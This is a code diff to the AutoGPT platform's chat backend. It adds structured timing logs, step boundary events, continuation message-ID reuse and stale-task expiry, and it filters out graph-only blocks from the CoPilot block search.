+        context = "No prior understanding saved yet. Continue the existing conversation naturally."
    else:
        context = "This is the first time you are meeting the user. Greet them and introduce them to the platform"

@@ -351,6 +359,10 @@ async def stream_chat_completion(
    retry_count: int = 0,
    session: ChatSession | None = None,
    context: dict[str, str] | None = None,  # {url: str, content: str}
+    _continuation_message_id: (
+        str | None
+    ) = None,  # Internal: reuse message ID for tool call continuations
+    _task_id: str | None = None,  # Internal: task ID for SSE reconnection support
 ) -> AsyncGenerator[StreamBaseResponse, None]:
    """Main entry point for streaming chat completions with database handling.

@@ -368,24 +380,47 @@ async def stream_chat_completion(

    Raises:
        NotFoundError: If session_id is invalid
-        ValueError: If max_context_messages is exceeded

    """
+    completion_start = time.monotonic()
+
+    # Build log metadata for structured logging
+    log_meta = {"component": "ChatService", "session_id": session_id}
+    if user_id:
+        log_meta["user_id"] = user_id
+
    logger.info(
-        f"Streaming chat completion for session {session_id} for message {message} and user id {user_id}. Message is user message: {is_user_message}"
+        f"[TIMING] stream_chat_completion STARTED, session={session_id}, user={user_id}, "
+        f"message_len={len(message) if message else 0}, is_user={is_user_message}",
+        extra={
+            "json_fields": {
+                **log_meta,
+                "message_len": len(message) if message else 0,
+                "is_user_message": is_user_message,
+            }
+        },
    )

    # Only fetch from Redis if session not provided (initial call)
    if session is None:
+        fetch_start = time.monotonic()
        session = await get_chat_session(session_id, user_id)
+        fetch_time = (time.monotonic() - fetch_start) * 1000
        logger.info(
-            f"Fetched session from Redis: {session.session_id if session else 'None'}, "
-            f"message_count={len(session.messages) if session else 0}"
+            f"[TIMING] get_chat_session took {fetch_time:.1f}ms, "
+            f"n_messages={len(session.messages) if session else 0}",
+            extra={
+                "json_fields": {
+                    **log_meta,
+                    "duration_ms": fetch_time,
+                    "n_messages": len(session.messages) if session else 0,
+                }
+            },
        )
    else:
        logger.info(
-            f"Using provided session object: {session.session_id}, "
-            f"message_count={len(session.messages)}"
+            f"[TIMING] Using provided session, messages={len(session.messages)}",
+            extra={"json_fields": {**log_meta, "n_messages": len(session.messages)}},
        )

    if not session:
@@ -406,23 +441,32 @@ async def stream_chat_completion(

        # Track user message in PostHog
        if is_user_message:
+            posthog_start = time.monotonic()
            track_user_message(
                user_id=user_id,
                session_id=session_id,
                message_length=len(message),
            )
+            posthog_time = (time.monotonic() - posthog_start) * 1000
+            logger.info(
+                f"[TIMING] track_user_message took {posthog_time:.1f}ms",
+                extra={"json_fields": {**log_meta, "duration_ms": posthog_time}},
+            )

-    logger.info(
-        f"Upserting session: {session.session_id} with user id {session.user_id}, "
-        f"message_count={len(session.messages)}"
-    )
+    upsert_start = time.monotonic()
    session = await upsert_chat_session(session)
+    upsert_time = (time.monotonic() - upsert_start) * 1000
+    logger.info(
+        f"[TIMING] upsert_chat_session took {upsert_time:.1f}ms",
+        extra={"json_fields": {**log_meta, "duration_ms": upsert_time}},
+    )
    assert session, "Session not found"

    # Generate title for new sessions on first user message (non-blocking)
    # Check: is_user_message, no title yet, and this is the first user message
-    if is_user_message and message and not session.title:
-        user_messages = [m for m in session.messages if m.role == "user"]
+    user_messages = [m for m in session.messages if m.role == "user"]
+    first_user_msg = message or (user_messages[0].content if user_messages else None)
+    if is_user_message and first_user_msg and not session.title:
        if len(user_messages) == 1:
            # First user message - generate title in background
            import asyncio
@@ -430,7 +474,7 @@ async def stream_chat_completion(
            # Capture only the values we need (not the session object) to avoid
            # stale data issues when the main flow modifies the session
            captured_session_id = session_id
-            captured_message = message
+            captured_message = first_user_msg
            captured_user_id = user_id

            async def _update_title():
@@ -454,7 +498,13 @@ async def stream_chat_completion(
            asyncio.create_task(_update_title())

    # Build system prompt with business understanding
+    prompt_start = time.monotonic()
    system_prompt, understanding = await _build_system_prompt(user_id)
+    prompt_time = (time.monotonic() - prompt_start) * 1000
+    logger.info(
+        f"[TIMING] _build_system_prompt took {prompt_time:.1f}ms",
+        extra={"json_fields": {**log_meta, "duration_ms": prompt_time}},
+    )

    # Initialize variables for streaming
    assistant_response = ChatMessage(
@@ -479,13 +529,27 @@ async def stream_chat_completion(
    # Generate unique IDs for AI SDK protocol
    import uuid as uuid_module

-    message_id = str(uuid_module.uuid4())
+    is_continuation = _continuation_message_id is not None
+    message_id = _continuation_message_id or str(uuid_module.uuid4())
    text_block_id = str(uuid_module.uuid4())

-    # Yield message start
-    yield StreamStart(messageId=message_id)
+    # Only yield message start for the initial call, not for continuations.
+    setup_time = (time.monotonic() - completion_start) * 1000
+    logger.info(
+        f"[TIMING] Setup complete, yielding StreamStart at {setup_time:.1f}ms",
+        extra={"json_fields": {**log_meta, "setup_time_ms": setup_time}},
+    )
+    if not is_continuation:
+        yield StreamStart(messageId=message_id, taskId=_task_id)
+
+    # Emit start-step before each LLM call (AI SDK uses this to add step boundaries)
+    yield StreamStartStep()

    try:
+        logger.info(
+            "[TIMING] Calling _stream_chat_chunks",
+            extra={"json_fields": log_meta},
+        )
        async for chunk in _stream_chat_chunks(
            session=session,
            tools=tools,
@@ -585,6 +649,10 @@ async def stream_chat_completion(
                    )
                yield chunk
            elif isinstance(chunk, StreamFinish):
+                if has_done_tool_call:
+                    # Tool calls happened — close the step but don't send message-level finish.
+                    # The continuation will open a new step, and finish will come at the end.
+                    yield StreamFinishStep()
                if not has_done_tool_call:
                    # Emit text-end before finish if we received text but haven't closed it
                    if has_received_text and not text_streaming_ended:
@@ -616,6 +684,8 @@ async def stream_chat_completion(
                            has_saved_assistant_message = True

                    has_yielded_end = True
+                    # Emit finish-step before finish (resets AI SDK text/reasoning state)
+                    yield StreamFinishStep()
                    yield chunk
            elif isinstance(chunk, StreamError):
                has_yielded_error = True
@@ -665,6 +735,10 @@ async def stream_chat_completion(
            logger.info(
                f"Retryable error encountered. Attempt {retry_count + 1}/{config.max_retries}"
            )
+            # Close the current step before retrying so the recursive call's
+            # StreamStartStep doesn't produce unbalanced step events.
+            if not has_yielded_end:
+                yield StreamFinishStep()
            should_retry = True
        else:
            # Non-retryable error or max retries exceeded
@@ -700,6 +774,7 @@ async def stream_chat_completion(
                error_response = StreamError(errorText=error_message)
                yield error_response
            if not has_yielded_end:
+                yield StreamFinishStep()
                yield StreamFinish()
            return

@@ -714,6 +789,8 @@ async def stream_chat_completion(
            retry_count=retry_count + 1,
            session=session,
            context=context,
+            _continuation_message_id=message_id,  # Reuse message ID since start was already sent
+            _task_id=_task_id,
        ):
            yield chunk
        return  # Exit after retry to avoid double-saving in finally block
@@ -783,6 +860,8 @@ async def stream_chat_completion(
            session=session,  # Pass session object to avoid Redis refetch
            context=context,
            tool_call_response=str(tool_response_messages),
+            _continuation_message_id=message_id,  # Reuse message ID to avoid duplicates
+            _task_id=_task_id,
        ):
            yield chunk

@@ -893,9 +972,21 @@ async def _stream_chat_chunks(
        SSE formatted JSON response objects

    """
+    import time as time_module
+
+    stream_chunks_start = time_module.perf_counter()
    model = config.model

-    logger.info("Starting pure chat stream")
+    # Build log metadata for structured logging
+    log_meta = {"component": "ChatService", "session_id": session.session_id}
+    if session.user_id:
+        log_meta["user_id"] = session.user_id
+
+    logger.info(
+        f"[TIMING] _stream_chat_chunks STARTED, session={session.session_id}, "
+        f"user={session.user_id}, n_messages={len(session.messages)}",
+        extra={"json_fields": {**log_meta, "n_messages": len(session.messages)}},
+    )

    messages = session.to_openai_messages()
    if system_prompt:
@@ -906,12 +997,18 @@ async def _stream_chat_chunks(
        messages = [system_message] + messages

    # Apply context window management
+    context_start = time_module.perf_counter()
    context_result = await _manage_context_window(
        messages=messages,
        model=model,
        api_key=config.api_key,
        base_url=config.base_url,
    )
+    context_time = (time_module.perf_counter() - context_start) * 1000
+    logger.info(
+        f"[TIMING] _manage_context_window took {context_time:.1f}ms",
+        extra={"json_fields": {**log_meta, "duration_ms": context_time}},
+    )

    if context_result.error:
        if "System prompt dropped" in context_result.error:
@@ -946,9 +1043,19 @@ async def _stream_chat_chunks(

        while retry_count <= MAX_RETRIES:
            try:
+                elapsed = (time_module.perf_counter() - stream_chunks_start) * 1000
+                retry_info = (
+                    f" (retry {retry_count}/{MAX_RETRIES})" if retry_count > 0 else ""
+                )
                logger.info(
-                    f"Creating OpenAI chat completion stream..."
-                    f"{f' (retry {retry_count}/{MAX_RETRIES})' if retry_count > 0 else ''}"
+                    f"[TIMING] Creating OpenAI stream at {elapsed:.1f}ms{retry_info}",
+                    extra={
+                        "json_fields": {
+                            **log_meta,
+                            "elapsed_ms": elapsed,
+                            "retry_count": retry_count,
+                        }
+                    },
                )

                # Build extra_body for OpenRouter tracing and PostHog analytics
@@ -965,6 +1072,11 @@ async def _stream_chat_chunks(
                        :128
                    ]  # OpenRouter limit

+                # Enable adaptive thinking for Anthropic models via OpenRouter
+                if config.thinking_enabled and "anthropic" in model.lower():
+                    extra_body["reasoning"] = {"enabled": True}
+
+                api_call_start = time_module.perf_counter()
                stream = await client.chat.completions.create(
                    model=model,
                    messages=cast(list[ChatCompletionMessageParam], messages),
@@ -974,6 +1086,11 @@ async def _stream_chat_chunks(
                    stream_options=ChatCompletionStreamOptionsParam(include_usage=True),
                    extra_body=extra_body,
                )
+                api_init_time = (time_module.perf_counter() - api_call_start) * 1000
+                logger.info(
+                    f"[TIMING] OpenAI stream object returned in {api_init_time:.1f}ms",
+                    extra={"json_fields": {**log_meta, "duration_ms": api_init_time}},
+                )

                # Variables to accumulate tool calls
                tool_calls: list[dict[str, Any]] = []
@@ -984,10 +1101,13 @@ async def _stream_chat_chunks(

                # Track if we've started the text block
                text_started = False
+                first_content_chunk = True
+                chunk_count = 0

                # Process the stream
                chunk: ChatCompletionChunk
                async for chunk in stream:
+                    chunk_count += 1
                    if chunk.usage:
                        yield StreamUsage(
                            promptTokens=chunk.usage.prompt_tokens,
@@ -1010,6 +1130,23 @@ async def _stream_chat_chunks(
                            if not text_started and text_block_id:
                                yield StreamTextStart(id=text_block_id)
                                text_started = True
+                            # Log timing for first content chunk
+                            if first_content_chunk:
+                                first_content_chunk = False
+                                ttfc = (
+                                    time_module.perf_counter() - api_call_start
+                                ) * 1000
+                                logger.info(
+                                    f"[TIMING] FIRST CONTENT CHUNK at {ttfc:.1f}ms "
+                                    f"(since API call), n_chunks={chunk_count}",
+                                    extra={
+                                        "json_fields": {
+                                            **log_meta,
+                                            "time_to_first_chunk_ms": ttfc,
+                                            "n_chunks": chunk_count,
+                                        }
+                                    },
+                                )
                            # Stream the text delta
                            text_response = StreamTextDelta(
                                id=text_block_id or "",
@@ -1066,7 +1203,21 @@ async def _stream_chat_chunks(
                                        toolName=tool_calls[idx]["function"]["name"],
                                    )
                                    emitted_start_for_idx.add(idx)
-                logger.info(f"Stream complete. Finish reason: {finish_reason}")
+                stream_duration = time_module.perf_counter() - api_call_start
+                logger.info(
+                    f"[TIMING] OpenAI stream COMPLETE, finish_reason={finish_reason}, "
+                    f"duration={stream_duration:.2f}s, "
+                    f"n_chunks={chunk_count}, n_tool_calls={len(tool_calls)}",
+                    extra={
+                        "json_fields": {
+                            **log_meta,
+                            "stream_duration_ms": stream_duration * 1000,
+                            "finish_reason": finish_reason,
+                            "n_chunks": chunk_count,
+                            "n_tool_calls": len(tool_calls),
+                        }
+                    },
+                )

                # Yield all accumulated tool calls after the stream is complete
                # This ensures all tool call arguments have been fully received
@@ -1086,6 +1237,12 @@ async def _stream_chat_chunks(
                        # Re-raise to trigger retry logic in the parent function
                        raise

+                total_time = (time_module.perf_counter() - stream_chunks_start) * 1000
+                logger.info(
+                    f"[TIMING] _stream_chat_chunks COMPLETED in {total_time / 1000:.1f}s; "
+                    f"session={session.session_id}, user={session.user_id}",
+                    extra={"json_fields": {**log_meta, "total_time_ms": total_time}},
+                )
                yield StreamFinish()
                return
            except Exception as e:
@@ -1565,6 +1722,7 @@ async def _execute_long_running_tool_with_streaming(
            task_id,
            StreamError(errorText=str(e)),
        )
+        await stream_registry.publish_chunk(task_id, StreamFinishStep())
        await stream_registry.publish_chunk(task_id, StreamFinish())

        await _update_pending_operation(
@@ -1681,6 +1839,10 @@ async def _generate_llm_continuation(
        if session_id:
            extra_body["session_id"] = session_id[:128]

+        # Enable adaptive thinking for Anthropic models via OpenRouter
+        if config.thinking_enabled and "anthropic" in config.model.lower():
+            extra_body["reasoning"] = {"enabled": True}
+
        retry_count = 0
        last_error: Exception | None = None
        response = None
@@ -1811,6 +1973,10 @@ async def _generate_llm_continuation_with_streaming(
        if session_id:
            extra_body["session_id"] = session_id[:128]

+        # Enable adaptive thinking for Anthropic models via OpenRouter
+        if config.thinking_enabled and "anthropic" in config.model.lower():
+            extra_body["reasoning"] = {"enabled": True}
+
        # Make streaming LLM call (no tools - just text response)
        from typing import cast

@@ -1822,6 +1988,7 @@ async def _generate_llm_continuation_with_streaming(

        # Publish start event
        await stream_registry.publish_chunk(task_id, StreamStart(messageId=message_id))
+        await stream_registry.publish_chunk(task_id, StreamStartStep())
        await stream_registry.publish_chunk(task_id, StreamTextStart(id=text_block_id))

        # Stream the response
@@ -1845,6 +2012,7 @@ async def _generate_llm_continuation_with_streaming(

        # Publish end events
        await stream_registry.publish_chunk(task_id, StreamTextEnd(id=text_block_id))
+        await stream_registry.publish_chunk(task_id, StreamFinishStep())

        if assistant_content:
            # Reload session from DB to avoid race condition with user messages
@@ -1886,4 +2054,5 @@ async def _generate_llm_continuation_with_streaming(
            task_id,
            StreamError(errorText=f"Failed to generate response: {e}"),
        )
+        await stream_registry.publish_chunk(task_id, StreamFinishStep())
        await stream_registry.publish_chunk(task_id, StreamFinish())
--- a/autogpt_platform/backend/backend/api/features/chat/stream_registry.py
+++ b/autogpt_platform/backend/backend/api/features/chat/stream_registry.py
@@ -104,6 +104,24 @@ async def create_task(
    Returns:
        The created ActiveTask instance (metadata only)
    """
+    import time
+
+    start_time = time.perf_counter()
+
+    # Build log metadata for structured logging
+    log_meta = {
+        "component": "StreamRegistry",
+        "task_id": task_id,
+        "session_id": session_id,
+    }
+    if user_id:
+        log_meta["user_id"] = user_id
+
+    logger.info(
+        f"[TIMING] create_task STARTED, task={task_id}, session={session_id}, user={user_id}",
+        extra={"json_fields": log_meta},
+    )
+
    task = ActiveTask(
        task_id=task_id,
        session_id=session_id,
@@ -114,10 +132,18 @@ async def create_task(
    )

    # Store metadata in Redis
+    redis_start = time.perf_counter()
    redis = await get_redis_async()
+    redis_time = (time.perf_counter() - redis_start) * 1000
+    logger.info(
+        f"[TIMING] get_redis_async took {redis_time:.1f}ms",
+        extra={"json_fields": {**log_meta, "duration_ms": redis_time}},
+    )
+
    meta_key = _get_task_meta_key(task_id)
    op_key = _get_operation_mapping_key(operation_id)

+    hset_start = time.perf_counter()
    await redis.hset(  # type: ignore[misc]
        meta_key,
        mapping={
@@ -131,12 +157,22 @@ async def create_task(
            "created_at": task.created_at.isoformat(),
        },
    )
+    hset_time = (time.perf_counter() - hset_start) * 1000
+    logger.info(
+        f"[TIMING] redis.hset took {hset_time:.1f}ms",
+        extra={"json_fields": {**log_meta, "duration_ms": hset_time}},
+    )
+
    await redis.expire(meta_key, config.stream_ttl)

    # Create operation_id -> task_id mapping for webhook lookups
    await redis.set(op_key, task_id, ex=config.stream_ttl)

-    logger.debug(f"Created task {task_id} for session {session_id}")
+    total_time = (time.perf_counter() - start_time) * 1000
+    logger.info(
+        f"[TIMING] create_task COMPLETED in {total_time:.1f}ms; task={task_id}, session={session_id}",
+        extra={"json_fields": {**log_meta, "total_time_ms": total_time}},
+    )

    return task

@@ -156,26 +192,60 @@ async def publish_chunk(
    Returns:
        The Redis Stream message ID
    """
+    import time
+
+    start_time = time.perf_counter()
+    chunk_type = type(chunk).__name__
    chunk_json = chunk.model_dump_json()
    message_id = "0-0"

+    # Build log metadata
+    log_meta = {
+        "component": "StreamRegistry",
+        "task_id": task_id,
+        "chunk_type": chunk_type,
+    }
+
    try:
        redis = await get_redis_async()
        stream_key = _get_task_stream_key(task_id)

        # Write to Redis Stream for persistence and real-time delivery
+        xadd_start = time.perf_counter()
        raw_id = await redis.xadd(
            stream_key,
            {"data": chunk_json},
            maxlen=config.stream_max_length,
        )
+        xadd_time = (time.perf_counter() - xadd_start) * 1000
        message_id = raw_id if isinstance(raw_id, str) else raw_id.decode()

        # Set TTL on stream to match task metadata TTL
        await redis.expire(stream_key, config.stream_ttl)
+
+        total_time = (time.perf_counter() - start_time) * 1000
+        # Only log timing for significant chunks or slow operations
+        if (
+            chunk_type
+            in ("StreamStart", "StreamFinish", "StreamTextStart", "StreamTextEnd")
+            or total_time > 50
+        ):
+            logger.info(
+                f"[TIMING] publish_chunk {chunk_type} in {total_time:.1f}ms (xadd={xadd_time:.1f}ms)",
+                extra={
+                    "json_fields": {
+                        **log_meta,
+                        "total_time_ms": total_time,
+                        "xadd_time_ms": xadd_time,
+                        "message_id": message_id,
+                    }
+                },
+            )
    except Exception as e:
+        elapsed = (time.perf_counter() - start_time) * 1000
        logger.error(
-            f"Failed to publish chunk for task {task_id}: {e}",
+            f"[TIMING] Failed to publish chunk {chunk_type} after {elapsed:.1f}ms: {e}",
+            extra={"json_fields": {**log_meta, "elapsed_ms": elapsed, "error": str(e)}},
            exc_info=True,
        )

@@ -200,24 +270,61 @@ async def subscribe_to_task(
        An asyncio Queue that will receive stream chunks, or None if task not found
        or user doesn't have access
    """
+    import time
+
+    start_time = time.perf_counter()
+
+    # Build log metadata
+    log_meta = {"component": "StreamRegistry", "task_id": task_id}
+    if user_id:
+        log_meta["user_id"] = user_id
+
+    logger.info(
+        f"[TIMING] subscribe_to_task STARTED, task={task_id}, user={user_id}, last_msg={last_message_id}",
+        extra={"json_fields": {**log_meta, "last_message_id": last_message_id}},
+    )
+
+    redis_start = time.perf_counter()
    redis = await get_redis_async()
    meta_key = _get_task_meta_key(task_id)
    meta: dict[Any, Any] = await redis.hgetall(meta_key)  # type: ignore[misc]
+    hgetall_time = (time.perf_counter() - redis_start) * 1000
+    logger.info(
+        f"[TIMING] Redis hgetall took {hgetall_time:.1f}ms",
+        extra={"json_fields": {**log_meta, "duration_ms": hgetall_time}},
+    )

    if not meta:
-        logger.debug(f"Task {task_id} not found in Redis")
+        elapsed = (time.perf_counter() - start_time) * 1000
+        logger.info(
+            f"[TIMING] Task not found in Redis after {elapsed:.1f}ms",
+            extra={
+                "json_fields": {
+                    **log_meta,
+                    "elapsed_ms": elapsed,
+                    "reason": "task_not_found",
+                }
+            },
+        )
        return None

    # Note: Redis client uses decode_responses=True, so keys are strings
    task_status = meta.get("status", "")
    task_user_id = meta.get("user_id", "") or None
+    log_meta["session_id"] = meta.get("session_id", "")

    # Validate ownership - if task has an owner, requester must match
    if task_user_id:
        if user_id != task_user_id:
            logger.warning(
-                f"User {user_id} denied access to task {task_id} "
-                f"owned by {task_user_id}"
+                f"[TIMING] Access denied: user {user_id} tried to access task owned by {task_user_id}",
+                extra={
+                    "json_fields": {
+                        **log_meta,
+                        "task_owner": task_user_id,
+                        "reason": "access_denied",
+                    }
+                },
            )
            return None

@@ -225,7 +332,19 @@ async def subscribe_to_task(
    stream_key = _get_task_stream_key(task_id)

    # Step 1: Replay messages from Redis Stream
+    xread_start = time.perf_counter()
    messages = await redis.xread({stream_key: last_message_id}, block=0, count=1000)
+    xread_time = (time.perf_counter() - xread_start) * 1000
+    logger.info(
+        f"[TIMING] Redis xread (replay) took {xread_time:.1f}ms, status={task_status}",
+        extra={
+            "json_fields": {
+                **log_meta,
+                "duration_ms": xread_time,
+                "task_status": task_status,
+            }
+        },
+    )

    replayed_count = 0
    replay_last_id = last_message_id
@@ -244,19 +363,48 @@ async def subscribe_to_task(
                    except Exception as e:
                        logger.warning(f"Failed to replay message: {e}")

-    logger.debug(f"Task {task_id}: replayed {replayed_count} messages")
+    logger.info(
+        f"[TIMING] Replayed {replayed_count} messages, last_id={replay_last_id}",
+        extra={
+            "json_fields": {
+                **log_meta,
+                "n_messages_replayed": replayed_count,
+                "replay_last_id": replay_last_id,
+            }
+        },
+    )

    # Step 2: If task is still running, start stream listener for live updates
    if task_status == "running":
+        logger.info(
+            "[TIMING] Task still running, starting _stream_listener",
+            extra={"json_fields": {**log_meta, "task_status": task_status}},
+        )
        listener_task = asyncio.create_task(
-            _stream_listener(task_id, subscriber_queue, replay_last_id)
+            _stream_listener(task_id, subscriber_queue, replay_last_id, log_meta)
        )
        # Track listener task for cleanup on unsubscribe
        _listener_tasks[id(subscriber_queue)] = (task_id, listener_task)
    else:
        # Task is completed/failed - add finish marker
+        logger.info(
+            f"[TIMING] Task already {task_status}, adding StreamFinish",
+            extra={"json_fields": {**log_meta, "task_status": task_status}},
+        )
        await subscriber_queue.put(StreamFinish())

+    total_time = (time.perf_counter() - start_time) * 1000
+    logger.info(
+        f"[TIMING] subscribe_to_task COMPLETED in {total_time:.1f}ms; task={task_id}, "
+        f"n_messages_replayed={replayed_count}",
+        extra={
+            "json_fields": {
+                **log_meta,
+                "total_time_ms": total_time,
+                "n_messages_replayed": replayed_count,
+            }
+        },
+    )
    return subscriber_queue


@@ -264,6 +412,7 @@ async def _stream_listener(
    task_id: str,
    subscriber_queue: asyncio.Queue[StreamBaseResponse],
    last_replayed_id: str,
+    log_meta: dict | None = None,
 ) -> None:
    """Listen to Redis Stream for new messages using blocking XREAD.

@@ -274,10 +423,27 @@ async def _stream_listener(
        task_id: Task ID to listen for
        subscriber_queue: Queue to deliver messages to
        last_replayed_id: Last message ID from replay (continue from here)
+        log_meta: Structured logging metadata
    """
+    import time
+
+    start_time = time.perf_counter()
+
+    # Use provided log_meta or build minimal one
+    if log_meta is None:
+        log_meta = {"component": "StreamRegistry", "task_id": task_id}
+
+    logger.info(
+        f"[TIMING] _stream_listener STARTED, task={task_id}, last_id={last_replayed_id}",
+        extra={"json_fields": {**log_meta, "last_replayed_id": last_replayed_id}},
+    )
+
    queue_id = id(subscriber_queue)
    # Track the last successfully delivered message ID for recovery hints
    last_delivered_id = last_replayed_id
+    messages_delivered = 0
+    first_message_time = None
+    xread_count = 0

    try:
        redis = await get_redis_async()
@@ -287,9 +453,39 @@ async def _stream_listener(
        while True:
            # Block for up to 30 seconds waiting for new messages
            # This allows periodic checking if task is still running
+            xread_start = time.perf_counter()
+            xread_count += 1
            messages = await redis.xread(
                {stream_key: current_id}, block=30000, count=100
            )
+            xread_time = (time.perf_counter() - xread_start) * 1000
+
+            if messages:
+                msg_count = sum(len(msgs) for _, msgs in messages)
+                logger.info(
+                    f"[TIMING] xread #{xread_count} returned {msg_count} messages in {xread_time:.1f}ms",
+                    extra={
+                        "json_fields": {
+                            **log_meta,
+                            "xread_count": xread_count,
+                            "n_messages": msg_count,
+                            "duration_ms": xread_time,
+                        }
+                    },
+                )
+            elif xread_time > 1000:
+                # No messages: log only reads over 1s, i.e. the 30s block timing out
+                logger.info(
+                    f"[TIMING] xread #{xread_count} timeout after {xread_time:.1f}ms",
+                    extra={
+                        "json_fields": {
+                            **log_meta,
+                            "xread_count": xread_count,
+                            "duration_ms": xread_time,
+                            "reason": "timeout",
+                        }
+                    },
+                )

            if not messages:
                # Timeout - check if task is still running
@@ -326,10 +522,30 @@ async def _stream_listener(
                                )
                                # Update last delivered ID on successful delivery
                                last_delivered_id = current_id
+                                messages_delivered += 1
+                                if first_message_time is None:
+                                    first_message_time = time.perf_counter()
+                                    elapsed = (first_message_time - start_time) * 1000
+                                    logger.info(
+                                        f"[TIMING] FIRST live message at {elapsed:.1f}ms, type={type(chunk).__name__}",
+                                        extra={
+                                            "json_fields": {
+                                                **log_meta,
+                                                "elapsed_ms": elapsed,
+                                                "chunk_type": type(chunk).__name__,
+                                            }
+                                        },
+                                    )
                            except asyncio.TimeoutError:
                                logger.warning(
-                                    f"Subscriber queue full for task {task_id}, "
-                                    f"message delivery timed out after {QUEUE_PUT_TIMEOUT}s"
+                                    f"[TIMING] Subscriber queue full, delivery timed out after {QUEUE_PUT_TIMEOUT}s",
+                                    extra={
+                                        "json_fields": {
+                                            **log_meta,
+                                            "timeout_s": QUEUE_PUT_TIMEOUT,
+                                            "reason": "queue_full",
+                                        }
+                                    },
                                )
                                # Send overflow error with recovery info
                                try:
@@ -351,15 +567,44 @@ async def _stream_listener(

                            # Stop listening on finish
                            if isinstance(chunk, StreamFinish):
+                                total_time = (time.perf_counter() - start_time) * 1000
+                                logger.info(
+                                    f"[TIMING] StreamFinish received in {total_time/1000:.1f}s; delivered={messages_delivered}",
+                                    extra={
+                                        "json_fields": {
+                                            **log_meta,
+                                            "total_time_ms": total_time,
+                                            "messages_delivered": messages_delivered,
+                                        }
+                                    },
+                                )
                                return
                    except Exception as e:
-                        logger.warning(f"Error processing stream message: {e}")
+                        logger.warning(
+                            f"Error processing stream message: {e}",
+                            extra={"json_fields": {**log_meta, "error": str(e)}},
+                        )

    except asyncio.CancelledError:
-        logger.debug(f"Stream listener cancelled for task {task_id}")
+        elapsed = (time.perf_counter() - start_time) * 1000
+        logger.info(
+            f"[TIMING] _stream_listener CANCELLED after {elapsed:.1f}ms, delivered={messages_delivered}",
+            extra={
+                "json_fields": {
+                    **log_meta,
+                    "elapsed_ms": elapsed,
+                    "messages_delivered": messages_delivered,
+                    "reason": "cancelled",
+                }
+            },
+        )
        raise  # Re-raise to propagate cancellation
    except Exception as e:
-        logger.error(f"Stream listener error for task {task_id}: {e}")
+        elapsed = (time.perf_counter() - start_time) * 1000
+        logger.error(
+            f"[TIMING] _stream_listener ERROR after {elapsed:.1f}ms: {e}",
+            extra={"json_fields": {**log_meta, "elapsed_ms": elapsed, "error": str(e)}},
+        )
        # On error, send finish to unblock subscriber
        try:
            await asyncio.wait_for(
@@ -368,10 +613,24 @@ async def _stream_listener(
            )
        except (asyncio.TimeoutError, asyncio.QueueFull):
            logger.warning(
-                f"Could not deliver finish event for task {task_id} after error"
+                "Could not deliver finish event after error",
+                extra={"json_fields": log_meta},
            )
    finally:
        # Clean up listener task mapping on exit
+        total_time = (time.perf_counter() - start_time) * 1000
+        logger.info(
+            f"[TIMING] _stream_listener FINISHED in {total_time/1000:.1f}s; task={task_id}, "
+            f"delivered={messages_delivered}, xread_count={xread_count}",
+            extra={
+                "json_fields": {
+                    **log_meta,
+                    "total_time_ms": total_time,
+                    "messages_delivered": messages_delivered,
+                    "xread_count": xread_count,
+                }
+            },
+        )
        _listener_tasks.pop(queue_id, None)


@@ -555,6 +814,28 @@ async def get_active_task_for_session(
                if task_user_id and user_id != task_user_id:
                    continue

+                # Auto-expire stale tasks that exceeded stream_timeout
+                created_at_str = meta.get("created_at", "")
+                if created_at_str:
+                    try:
+                        created_at = datetime.fromisoformat(created_at_str)
+                        age_seconds = (
+                            datetime.now(timezone.utc) - created_at
+                        ).total_seconds()
+                        if age_seconds > config.stream_timeout:
+                            logger.warning(
+                                f"[TASK_LOOKUP] Auto-expiring stale task {task_id[:8]}... "
+                                f"(age={age_seconds:.0f}s > timeout={config.stream_timeout}s)"
+                            )
+                            await mark_task_completed(task_id, "failed")
+                            continue
+                    except (ValueError, TypeError):
+                        pass
+
+                logger.info(
+                    f"[TASK_LOOKUP] Found running task {task_id[:8]}... for session {session_id[:8]}..."
+                )
+
                # Get the last message ID from Redis Stream
                stream_key = _get_task_stream_key(task_id)
                last_id = "0-0"
@@ -598,8 +879,10 @@ def _reconstruct_chunk(chunk_data: dict) -> StreamBaseResponse | None:
        ResponseType,
        StreamError,
        StreamFinish,
+        StreamFinishStep,
        StreamHeartbeat,
        StreamStart,
+        StreamStartStep,
        StreamTextDelta,
        StreamTextEnd,
        StreamTextStart,
@@ -613,6 +896,8 @@ def _reconstruct_chunk(chunk_data: dict) -> StreamBaseResponse | None:
    type_to_class: dict[str, type[StreamBaseResponse]] = {
        ResponseType.START.value: StreamStart,
        ResponseType.FINISH.value: StreamFinish,
+        ResponseType.START_STEP.value: StreamStartStep,
+        ResponseType.FINISH_STEP.value: StreamFinishStep,
        ResponseType.TEXT_START.value: StreamTextStart,
        ResponseType.TEXT_DELTA.value: StreamTextDelta,
        ResponseType.TEXT_END.value: StreamTextEnd,
--- a/autogpt_platform/backend/backend/api/features/chat/tools/find_block.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/find_block.py
@@ -13,10 +13,32 @@ from backend.api.features.chat.tools.models import (
    NoResultsResponse,
 )
 from backend.api.features.store.hybrid_search import unified_hybrid_search
-from backend.data.block import get_block
+from backend.data.block import BlockType, get_block

 logger = logging.getLogger(__name__)

+_TARGET_RESULTS = 10
+# Over-fetch to compensate for post-hoc filtering of graph-only blocks.
+# 40 is 2x the number currently removed; the query speed difference between 10 and 40 is minimal
+_OVERFETCH_PAGE_SIZE = 40
+
+# Block types that only work within graphs and cannot run standalone in CoPilot.
+COPILOT_EXCLUDED_BLOCK_TYPES = {
+    BlockType.INPUT,  # Graph interface definition - data enters via chat, not graph inputs
+    BlockType.OUTPUT,  # Graph interface definition - data exits via chat, not graph outputs
+    BlockType.WEBHOOK,  # Wait for external events - would hang forever in CoPilot
+    BlockType.WEBHOOK_MANUAL,  # Same as WEBHOOK
+    BlockType.NOTE,  # Visual annotation only - no runtime behavior
+    BlockType.HUMAN_IN_THE_LOOP,  # Pauses for human approval - CoPilot IS human-in-the-loop
+    BlockType.AGENT,  # AgentExecutorBlock requires execution_context - use run_agent tool
+}
+
+# Specific block IDs excluded from CoPilot (STANDARD type but still require graph context)
+COPILOT_EXCLUDED_BLOCK_IDS = {
+    # SmartDecisionMakerBlock - dynamically discovers downstream blocks via graph topology
+    "3b191d9f-356f-482d-8238-ba04b6d18381",
+}
+

 class FindBlockTool(BaseTool):
    """Tool for searching available blocks."""
@@ -88,7 +110,7 @@ class FindBlockTool(BaseTool):
                query=query,
                content_types=[ContentType.BLOCK],
                page=1,
-                page_size=10,
+                page_size=_OVERFETCH_PAGE_SIZE,
            )

            if not results:
